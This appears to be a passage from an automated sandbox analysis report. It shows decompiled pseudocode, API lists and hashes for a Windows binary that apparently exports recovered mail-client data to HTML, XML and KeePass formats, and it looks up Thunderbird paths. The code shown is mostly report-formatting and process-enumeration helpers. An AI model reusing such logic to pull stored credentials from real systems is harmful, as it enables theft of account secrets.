                                                                        • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                        • API String ID: 3269028891-3267283505
                                                                        • Opcode ID: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                        • Instruction ID: bd4ffbb0b4c73fbe97c341744dc0c87608cd01b58ef3e3991875b3aaf34b88fb
                                                                        • Opcode Fuzzy Hash: 53b4df83feeff12aad6ea8c9c33e414d6f76a23fb296a6d720f7d1efbd9f2591
                                                                        • Instruction Fuzzy Hash: 5251A77284425DBADB31D7A18C46EDA7ABC9F14344F0404FBF645E2152EA788FC98B68
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040F126, Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 101stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 95%
                                                                        			E0040F126(void* __edi, char* _a4, char* _a8) {
				int _v8;
				void _v263;
				char _v264;
				void _v519;
				char _v520;
				intOrPtr _t32;
				void* _t58;
				char* _t60;
				void* _t61;
				void* _t62;

				_t58 = __edi;
				_v264 = 0;
				memset( &_v263, 0, 0xfe);
				_v520 = 0;
				memset( &_v519, 0, 0xfe);
				_t62 = _t61 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
					_v8 = 0;
				}
				_t60 = _a4;
				 *_t60 = 0;
				if(_v8 != 0) {
					strcpy(_t60, "<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						sprintf( &_v264, " size=\"%d\"", _t32);
						strcat(_t60,  &_v264);
						_t62 = _t62 + 0x14;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
						strcat(_t60,  &_v264);
					}
					strcat(_t60, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "<b>");
				}
				strcat(_t60, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "</b>");
				}
				if(_v8 != 0) {
					strcat(_t60, "</font>");
				}
				return _t60;
			}













                                                                        0x0040f126
                                                                        0x0040f141
                                                                        0x0040f147
                                                                        0x0040f155
                                                                        0x0040f15b
                                                                        0x0040f160
                                                                        0x0040f167
                                                                        0x0040f16e
                                                                        0x0040f175
                                                                        0x0040f175
                                                                        0x0040f17b
                                                                        0x0040f17e
                                                                        0x0040f180
                                                                        0x0040f188
                                                                        0x0040f18d
                                                                        0x0040f194
                                                                        0x0040f1a3
                                                                        0x0040f1b0
                                                                        0x0040f1b5
                                                                        0x0040f1b5
                                                                        0x0040f1b8
                                                                        0x0040f1be
                                                                        0x0040f1da
                                                                        0x0040f1e7
                                                                        0x0040f1ec
                                                                        0x0040f1f5
                                                                        0x0040f1fb
                                                                        0x0040f1ff
                                                                        0x0040f207
                                                                        0x0040f20d
                                                                        0x0040f212
                                                                        0x0040f21c
                                                                        0x0040f224
                                                                        0x0040f22a
                                                                        0x0040f22e
                                                                        0x0040f236
                                                                        0x0040f23c
                                                                        0x0040f242

                                                                        APIs
                                                                        • memset.MSVCRT ref: 0040F147
                                                                        • memset.MSVCRT ref: 0040F15B
                                                                        • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                                        • sprintf.MSVCRT ref: 0040F1A3
                                                                        • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                                        • sprintf.MSVCRT ref: 0040F1DA
                                                                        • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                                        • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                                        • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                                        • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                                        • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                                        • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: strcat$memsetsprintf$strcpy
                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                        • API String ID: 1662040868-1996832678
                                                                        • Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                        • Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
                                                                        • Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                                        • Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409482, Relevance: 25.7, APIs: 10, Strings: 7, Instructions: 182stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 80%
                                                                        			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* __edi;
				void* _t83;
				void* _t100;
				char* _t103;
				intOrPtr* _t120;
				signed int _t121;
				char _t139;
				signed int _t152;
				signed int _t153;
				signed int _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t120 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t121 = 0xc;
				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
				asm("movsb");
				_t156 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t160 = _t158 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
					_t160 = _t160 + 0x14;
				}
				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t156;
				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
					while(1) {
						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
							strcpy( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t156;
						_t157 = _a8;
						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
						E0040F071(_v28,  &_v184);
						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
						_t153 = _t152 * 0x14;
						if(_t100 == 0xffffffff) {
							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
						} else {
							_push( *(_t153 + _v12 + 0x10));
							_push(E0040F071(_t100,  &_v492));
							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
							_t160 = _t160 + 0x10;
						}
						_t103 =  *(_t120 + 0x50);
						_t139 =  *_t103;
						if(_t139 == 0 || _t139 == 0x20) {
							strcat(_t103, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
						E00405EFD(_a4,  *(_t120 + 0x4c));
						_t160 = _t160 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
							goto L14;
						}
						_t156 = 0;
					}
				}
				L14:
				E00405EFD(_a4, "</table><p>");
				return E00405EFD(_a4, 0x412b1c);
			}































                                                                        0x00409482
                                                                        0x0040949b
                                                                        0x004094a2
                                                                        0x004094a9
                                                                        0x004094b5
                                                                        0x004094b7
                                                                        0x004094ba
                                                                        0x004094c1
                                                                        0x004094c5
                                                                        0x004094d4
                                                                        0x004094db
                                                                        0x004094e7
                                                                        0x004094eb
                                                                        0x004094f2
                                                                        0x004094f7
                                                                        0x00409503
                                                                        0x00409506
                                                                        0x0040951f
                                                                        0x00409524
                                                                        0x00409524
                                                                        0x0040952f
                                                                        0x00409539
                                                                        0x0040953c
                                                                        0x00409546
                                                                        0x0040954c
                                                                        0x0040955b
                                                                        0x00409566
                                                                        0x0040956c
                                                                        0x0040956f
                                                                        0x00409573
                                                                        0x00409577
                                                                        0x0040957f
                                                                        0x00409582
                                                                        0x0040958d
                                                                        0x0040959a
                                                                        0x004095ae
                                                                        0x004095bc
                                                                        0x004095c3
                                                                        0x004095c6
                                                                        0x004095cc
                                                                        0x00409601
                                                                        0x004095ce
                                                                        0x004095d1
                                                                        0x004095e4
                                                                        0x004095ed
                                                                        0x004095f2
                                                                        0x004095f2
                                                                        0x00409608
                                                                        0x0040960b
                                                                        0x0040960f
                                                                        0x0040961c
                                                                        0x00409622
                                                                        0x0040962c
                                                                        0x00409650
                                                                        0x0040965b
                                                                        0x00409660
                                                                        0x00409663
                                                                        0x0040966c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00409544
                                                                        0x00409544
                                                                        0x00409546
                                                                        0x00409672
                                                                        0x0040967a
                                                                        0x00409692

                                                                        APIs
                                                                        • memset.MSVCRT ref: 004094A2
                                                                        • memset.MSVCRT ref: 004094C5
                                                                        • memset.MSVCRT ref: 004094DB
                                                                        • memset.MSVCRT ref: 004094EB
                                                                        • sprintf.MSVCRT ref: 0040951F
                                                                        • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                                        • sprintf.MSVCRT ref: 004095ED
                                                                        • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                                          • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                                        • strcpy.MSVCRT(?,?), ref: 00409601
                                                                        • sprintf.MSVCRT ref: 00409650
                                                                          • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                                          • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,73B74DE0,00000000,?,?,004092ED,00000001,00412B1C,73B74DE0), ref: 00405F17
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                        • API String ID: 2822972341-601624466
                                                                        • Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                        • Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
                                                                        • Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                                        • Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409EC4, Relevance: 25.6, APIs: 17, Instructions: 108windowCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 58%
                                                                        			E00409EC4(void* __eax) {
				void* _v36;
				long _v40;
				void* _v44;
				void* _v56;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				void* _t47;

				_t40 = ImageList_Create;
				_t47 = __eax;
				_t44 = __imp__ImageList_SetImageCount;
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
					 *(_t47 + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
				}
				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
					 *(_t47 + 0x190) = _t34;
					 *_t44(_t34, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
				}
				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
				 *(_t47 + 0x188) = _t21;
				 *_t44(_t21, 2);
				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
				_t42 = _t24;
				 *_t44( *(_t47 + 0x188), 0);
				_t26 = GetSysColor(0xf);
				_v40 = _t26;
				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
				DeleteObject(_v56);
				DeleteObject(_t42);
				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
			}
















                                                                        0x00409ec7
                                                                        0x00409ed5
                                                                        0x00409edf
                                                                        0x00409ee5
                                                                        0x00409ef1
                                                                        0x00409ef6
                                                                        0x00409efc
                                                                        0x00409f11
                                                                        0x00409f11
                                                                        0x00409f1a
                                                                        0x00409f26
                                                                        0x00409f2b
                                                                        0x00409f31
                                                                        0x00409f46
                                                                        0x00409f46
                                                                        0x00409f52
                                                                        0x00409f57
                                                                        0x00409f5d
                                                                        0x00409f93
                                                                        0x00409f97
                                                                        0x00409fa1
                                                                        0x00409fa3
                                                                        0x00409fa7
                                                                        0x00409fb8
                                                                        0x00409fc2
                                                                        0x00409fcf
                                                                        0x00409fdb
                                                                        0x00409fde
                                                                        0x0040a004

                                                                        APIs
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 00409F11
                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 00409F46
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                                        • LoadImageA.USER32 ref: 00409F7B
                                                                        • LoadImageA.USER32 ref: 00409F97
                                                                        • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                                        • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                                        • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                                        • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                                        • DeleteObject.GDI32(?), ref: 00409FDB
                                                                        • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                                        • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 00409FFC
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                                        • String ID:
                                                                        • API String ID: 3411798969-0
                                                                        • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                        • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                                        • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                                        • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040B841, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 70%
                                                                        			E0040B841(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push("/shtml");
				L004115B2();
				if(__eax != 0) {
					_push("/sverhtml");
					L004115B2();
					if(__eax != 0) {
						_push("/sxml");
						L004115B2();
						if(__eax != 0) {
							_push("/stab");
							L004115B2();
							if(__eax != 0) {
								_push("/scomma");
								L004115B2();
								if(__eax != 0) {
									_push("/stabular");
									L004115B2();
									if(__eax != 0) {
										_push("/skeepass");
										L004115C4();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 3;
										return _t5;
									}
								} else {
									_t6 = 7;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 6;
							return _t8;
						}
					} else {
						_t9 = 5;
						return _t9;
					}
				} else {
					_t10 = 4;
					return _t10;
				}
			}









                                                                        0x0040b842
                                                                        0x0040b847
                                                                        0x0040b850
                                                                        0x0040b857
                                                                        0x0040b85c
                                                                        0x0040b865
                                                                        0x0040b86c
                                                                        0x0040b871
                                                                        0x0040b87a
                                                                        0x0040b881
                                                                        0x0040b886
                                                                        0x0040b88f
                                                                        0x0040b896
                                                                        0x0040b89b
                                                                        0x0040b8a4
                                                                        0x0040b8ab
                                                                        0x0040b8b0
                                                                        0x0040b8b9
                                                                        0x0040b8c0
                                                                        0x0040b8c5
                                                                        0x0040b8cc
                                                                        0x0040b8d6
                                                                        0x0040b8bb
                                                                        0x0040b8bd
                                                                        0x0040b8be
                                                                        0x0040b8be
                                                                        0x0040b8a6
                                                                        0x0040b8a8
                                                                        0x0040b8a9
                                                                        0x0040b8a9
                                                                        0x0040b891
                                                                        0x0040b893
                                                                        0x0040b894
                                                                        0x0040b894
                                                                        0x0040b87c
                                                                        0x0040b87e
                                                                        0x0040b87f
                                                                        0x0040b87f
                                                                        0x0040b867
                                                                        0x0040b869
                                                                        0x0040b86a
                                                                        0x0040b86a
                                                                        0x0040b852
                                                                        0x0040b854
                                                                        0x0040b855
                                                                        0x0040b855

                                                                        APIs
                                                                        • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                                        • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: _stricmp
                                                                        • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                        • API String ID: 2884411883-1959339147
                                                                        • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                        • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                                        • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                                        • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040F243, Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 114stringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 92%
                                                                        			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void _v771;
				char _v772;
				void _v1027;
				char _v1028;
				char _v1284;
				char _v2308;
				char _t47;
				intOrPtr* _t50;
				void* _t57;
				intOrPtr* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				_v1028 = 0;
				memset( &_v1027, 0, 0xfe);
				_v772 = 0;
				memset( &_v771, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t77 = _t76 + 0x24;
				if(_a16 != 0xffffffff) {
					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
					_t77 = _t77 + 0x14;
				}
				if(_a20 != 0xffffffff) {
					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
					strcpy( &_v516, "</font>");
					_t77 = _t77 + 0x1c;
				}
				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
				E00405EFD(_a4,  &_v2308);
				_t47 = _a12;
				_t78 = _t77 + 0x14;
				if(_t47 > 0) {
					_t73 = _a8 + 4;
					_a16 = _t47;
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						_t50 =  *_t73;
						_t79 = _t78 + 0xc;
						if( *_t50 == 0) {
							_v260 = 0;
						} else {
							sprintf( &_v260, " width=\"%s\"", _t50);
							_t79 = _t79 + 0xc;
						}
						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
						_t57 = E00405EFD(_a4,  &_v2308);
						_t78 = _t79 + 0x20;
						_t73 = _t73 + 8;
						_t34 =  &_a16;
						 *_t34 = _a16 - 1;
					} while ( *_t34 != 0);
					return _t57;
				}
				return _t47;
			}





















                                                                        0x0040f25e
                                                                        0x0040f264
                                                                        0x0040f272
                                                                        0x0040f278
                                                                        0x0040f286
                                                                        0x0040f28c
                                                                        0x0040f291
                                                                        0x0040f298
                                                                        0x0040f2b6
                                                                        0x0040f2bb
                                                                        0x0040f2bb
                                                                        0x0040f2c2
                                                                        0x0040f2e0
                                                                        0x0040f2f1
                                                                        0x0040f2f6
                                                                        0x0040f2f6
                                                                        0x0040f30c
                                                                        0x0040f31b
                                                                        0x0040f320
                                                                        0x0040f323
                                                                        0x0040f328
                                                                        0x0040f332
                                                                        0x0040f335
                                                                        0x0040f338
                                                                        0x0040f341
                                                                        0x0040f347
                                                                        0x0040f34c
                                                                        0x0040f34e
                                                                        0x0040f353
                                                                        0x0040f36c
                                                                        0x0040f355
                                                                        0x0040f362
                                                                        0x0040f367
                                                                        0x0040f367
                                                                        0x0040f396
                                                                        0x0040f3a5
                                                                        0x0040f3aa
                                                                        0x0040f3ad
                                                                        0x0040f3b0
                                                                        0x0040f3b0
                                                                        0x0040f3b0
                                                                        0x00000000
                                                                        0x0040f3b5
                                                                        0x0040f3b9

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: sprintf$memset$strcpy
                                                                        • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                        • API String ID: 898937289-3842416460
                                                                        • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                        • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                                        • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                                        • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040E0DA, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E0040E0DA() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x417518 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryA("psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
					 *0x416fec = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x416fe4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
							 *0x416fdc = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x41710c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x416fe8 = _t2;
									if(_t2 != 0) {
										 *0x417518 = 1;
									}
								}
							}
						}
					}
					if( *0x417518 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}






                                                                        0x0040e0e1
                                                                        0x0040e171
                                                                        0x0040e171
                                                                        0x0040e0ed
                                                                        0x0040e0f3
                                                                        0x0040e0f7
                                                                        0x0040e170
                                                                        0x00000000
                                                                        0x0040e0f9
                                                                        0x0040e106
                                                                        0x0040e10a
                                                                        0x0040e10f
                                                                        0x0040e117
                                                                        0x0040e11b
                                                                        0x0040e120
                                                                        0x0040e128
                                                                        0x0040e12c
                                                                        0x0040e131
                                                                        0x0040e139
                                                                        0x0040e13d
                                                                        0x0040e142
                                                                        0x0040e14a
                                                                        0x0040e14e
                                                                        0x0040e153
                                                                        0x0040e155
                                                                        0x0040e155
                                                                        0x0040e153
                                                                        0x0040e142
                                                                        0x0040e131
                                                                        0x0040e120
                                                                        0x0040e167
                                                                        0x0040e16a
                                                                        0x0040e16a
                                                                        0x00000000
                                                                        0x0040e167

                                                                        APIs
                                                                        • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 0040E117
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExA), ref: 0040E128
                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 0040E139
                                                                        • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 0040E14A
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 0040E16A
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.692418330.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.692538060.0000000000418000.00000040.00000001.sdmp Download File
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                        • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameA$GetModuleFileNameExA$GetModuleInformation$psapi.dll
                                                                        • API String ID: 2449869053-232097475
                                                                        • Opcode ID: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                        • Instruction ID: ee37d54ff12c00b719d991246764d0af3e5b6fb2a2d0f9e8910a6c9c4b0fdd5c
                                                                        • Opcode Fuzzy Hash: ce59c7be58069c2add821b7db74a10a85a70ad25a6d5f1115d61fb7aecc40683
                                                                        • Instruction Fuzzy Hash: F0015E31740311EAC711EB266D40FE73EB85B48B91B11843BE544E52A4D778C5928A6C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00410525, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 136stringregistryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 84%
                                                                        			E00410525(char* __eax, void* __edx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				char _v6;
				char _v7;
				char _v8;
				int _v12;
				intOrPtr _v16;
				void* _v20;
				short* _v24;
				unsigned int _v28;
				char* _v32;
				int _v36;
				intOrPtr _v40;
				signed int _v44;
				void _v299;
				char _v300;
				void _v555;
				char _v556;
				char _v1080;
				void* __esi;
				int _t56;
				intOrPtr _t58;
				intOrPtr _t64;
				char _t92;
				char* _t93;
				void* _t100;
				signed int _t102;
				signed int _t107;
				intOrPtr _t108;
				void* _t113;

				_t113 = __eflags;
